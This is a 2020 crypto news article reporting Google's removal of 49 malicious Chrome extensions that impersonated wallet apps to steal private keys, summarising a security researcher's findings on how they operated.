Google removes 49 more crypto data-stealing malicious extensions

By:
on  Apr 15, 2020
Updated:  Apr 28, 2020
Listen
3 min read
  • Google recently removed 49 different extensions for its Chrome browser.
  • The removed extensions included fake apps that would try to steal users' crypto wallet details.
  • The creator of the extensions remains unknown at this time, but researchers confirmed that a single entity.

Follow Invezz on Telegram, Twitter, and Google News for instant updates >

Google’s Chrome browser recently started seeing quite a surge of fake extensions whose purpose is to steal user crypto data. The growth in popularity of these extensions is so high that the company started to remove them massively.

The firm has just removed another 49 such extensions from its Chrome web store, to protect its users. The extensions’ purpose is to trick users into downloading them and then steal information regarding their crypto wallets.

Are you looking for signals & alerts from pro-traders? Sign-up to Invezz Signalsâ„¢ for FREE. Takes 2 mins.

Extensions posed as well-known wallet apps

Copy link to section

MyCrypto’s director of security, Harry Denley, explained the issue in detail in his recent post on Medium. He stated that the extensions manage to trick users into installing them by impersonating various apps.

One example includes Ledger, which is the case that made multiple headlines recently. Other examples include Electrum, Jaxx, KeepKey, Trezor, MetaMask, MyEtherWallet, Exodus, and others.

After the user installs them, the extensions would steal their wallets’ private keys and similar sensitive data. Denley also added that some of these extensions may be quite advanced, with entire networks of fake users who rated the app. Of course, the users would give the apps the best possible feedback, to trick others into using them.

Of course, the extensions contain malicious files, and they can store any data that users would enter. After that, it would either go to a Google form, or to a hacker-owned remote server.

All of the extensions come from a single entity, likely from Russia

Copy link to section

Another interesting detail, as revealed by the reports, is that all of these extensions come from the same person or group. Their creator also allegedly has links to Russia.

The hacker(s) also displayed an interesting approach to their victims. They did not use the extensions to steal their sensitive information as soon as they could have. Denley suggests that the hacker may have decided to wait and try to target the high-value wallets. Another explanation says that they may have tried to automate the theft process.

The researcher tested this theory by sending funds to several addresses. He also allowed the extension to steal the credentials. However, the funds remained undisturbed. At present, the hacker remains unidentified, so it is more than possible that they would create additional extensions. As a result, users should stay alert when trying to add new extensions to their browser.